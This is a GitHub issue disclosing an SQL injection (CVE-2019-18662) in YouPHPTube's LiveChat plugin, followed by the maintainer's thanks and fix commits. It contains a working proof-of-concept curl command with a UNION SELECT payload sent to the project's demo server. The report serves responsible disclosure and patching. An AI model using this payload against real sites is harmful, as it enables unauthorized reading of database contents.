Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SQL Injection in LiveChat plugin #2202

Closed
EgidioRomano opened this issue Oct 31, 2019 · 3 comments
Closed

SQL Injection in LiveChat plugin #2202

EgidioRomano opened this issue Oct 31, 2019 · 3 comments

Comments

@EgidioRomano
Copy link

EgidioRomano commented Oct 31, 2019
edited

User input passed through the "live_stream_code" POST parameter to /plugin/LiveChat/getChat.json.php is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in-band SQL Injection attacks. Successful exploitation of this vulnerability requires the "Live Chat" plugin to be enabled.

Proof of Concept:

curl -X POST -d "live_stream_code=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,VERSION(),31,32,33,34,35,36#" https://demo.youphptube.com/plugin/LiveChat/getChat.json.php
DanielnetoDotCom pushed a commit that referenced this issue Oct 31, 2019
https://github.com/YouPHPTube/YouPHPTube/issues/2202
d745b45
@DanielnetoDotCom
Copy link
Member

Thanks for noticing it, Security is the priority to us.

I fix was already sent.

@EgidioRomano
Copy link
Author

CVE-2019-18662 has been assigned to this vulnerability.

@DanielnetoDotCom
Copy link
Member

DanielnetoDotCom commented Nov 2, 2019
edited

Hi, can you help me? what is CVE-2019-18662?

DanielnetoDotCom pushed a commit that referenced this issue Nov 2, 2019
https://github.com/YouPHPTube/YouPHPTube/issues/2202
624dbee 
Add a better replace
DanielnetoDotCom pushed a commit that referenced this issue Nov 2, 2019
https://github.com/YouPHPTube/YouPHPTube/issues/2202
e5fd2c6 
Add a better replace
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@DanielnetoDotCom @EgidioRomano